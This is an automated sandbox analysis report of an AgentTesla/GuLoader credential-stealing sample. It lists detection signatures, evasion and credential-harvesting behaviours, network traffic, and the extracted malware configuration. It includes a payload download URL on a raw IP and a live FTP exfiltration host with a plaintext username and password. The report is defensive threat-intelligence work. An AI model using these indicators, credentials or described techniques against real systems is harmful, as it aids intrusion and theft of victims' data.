Edit tour

Windows Analysis Report
Awb 4586109146.bat.exe

Overview

General Information

Sample name:	Awb 4586109146.bat.exe
Analysis ID:	1577288
MD5:	a3bb238f798a512f7465f804735b8f9a
SHA1:	31c7c96a95c22e7f4ab58b0f5330c4c79172be79
SHA256:	9775ae8b4fa626011fb022ede69e2ec2bec2b7868bb70bda276da0145b4b410f
Tags:	batexeuser-abuse_ch
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Awb 4586109146.bat.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\Awb 4586109146.bat.exe" MD5: A3BB238F798A512F7465F804735B8F9A)

Awb 4586109146.bat.exe (PID: 2884 cmdline: "C:\Users\user\Desktop\Awb 4586109146.bat.exe" MD5: A3BB238F798A512F7465F804735B8F9A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Awb 4586109146.bat.exe PID: 2884	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Awb 4586109146.bat.exe PID: 2884	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:08:09.579335+0100	2803270	2	Potentially Bad Traffic	192.168.2.8	49711	84.38.133.48	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Awb 4586109146.bat.exe

Avira: detected

Found malware configuration

Source: Awb 4586109146.bat.exe.2884.6.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Multi AV Scanner detection for submitted file

Source: Awb 4586109146.bat.exe

Virustotal: Detection: 17%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Awb 4586109146.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: Awb 4586109146.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00402868 FindFirstFileW,	6_2_00402868
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_004059CC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_004065FD FindFirstFileW,FindClose,	6_2_004065FD

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49711 -> 84.38.133.48:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.48

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.133.48Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.concaribe.com

Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.48/wlSTiHSjDLYgnyIzSMV100.bin
Source: Awb 4586109146.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Awb 4586109146.bat.exe, 00000006.00000002.3908021425.0000000036991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405461

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040338F
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_0040338F

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_00406B15	0_2_00406B15
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_004072EC	0_2_004072EC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_00404C9E	0_2_00404C9E
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_73961B5F	0_2_73961B5F
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00406B15	6_2_00406B15
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_004072EC	6_2_004072EC
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00404C9E	6_2_00404C9E
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00154A58	6_2_00154A58
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00153E40	6_2_00153E40
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_00154188	6_2_00154188
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B83158	6_2_39B83158
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B856A0	6_2_39B856A0
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B8B2F0	6_2_39B8B2F0
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B866C0	6_2_39B866C0
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B80040	6_2_39B80040
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B87E40	6_2_39B87E40
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B8C240	6_2_39B8C240
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B85DB7	6_2_39B85DB7
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B82370	6_2_39B82370
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B87760	6_2_39B87760
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_39B8E468	6_2_39B8E468

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: String function: 00402C41 appears 51 times

Source: Awb 4586109146.bat.exe, 00000000.00000000.1422465208.0000000000473000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe
Source: Awb 4586109146.bat.exe, 00000006.00000002.3887463994.00000000064E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Awb 4586109146.bat.exe
Source: Awb 4586109146.bat.exe, 00000006.00000002.3880934724.0000000000473000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe
Source: Awb 4586109146.bat.exe	Binary or memory string: OriginalFilenameteth.exej% vs Awb 4586109146.bat.exe

Source: Awb 4586109146.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/10@2/2

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_0040338F
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Code function: 6_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		6_2_0040338F

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404722

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Code function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_00402104

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File created: C:\Users\user\AppData\Local\sillinesses

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsgED34.tmp

Jump to behavior

Source: Awb 4586109146.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Awb 4586109146.bat.exe

Virustotal: Detection: 17%

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe

File read: C:\Users\user\Desktop\Awb 4586109146.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Process created: C:\Users\user\Desktop\Awb 4586109146.bat.exe "C:\Users\user\Desktop\Awb 4586109146.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Awb 4586109146.bat.exe	Section loaded: gpapi.dll	Jump to behavior
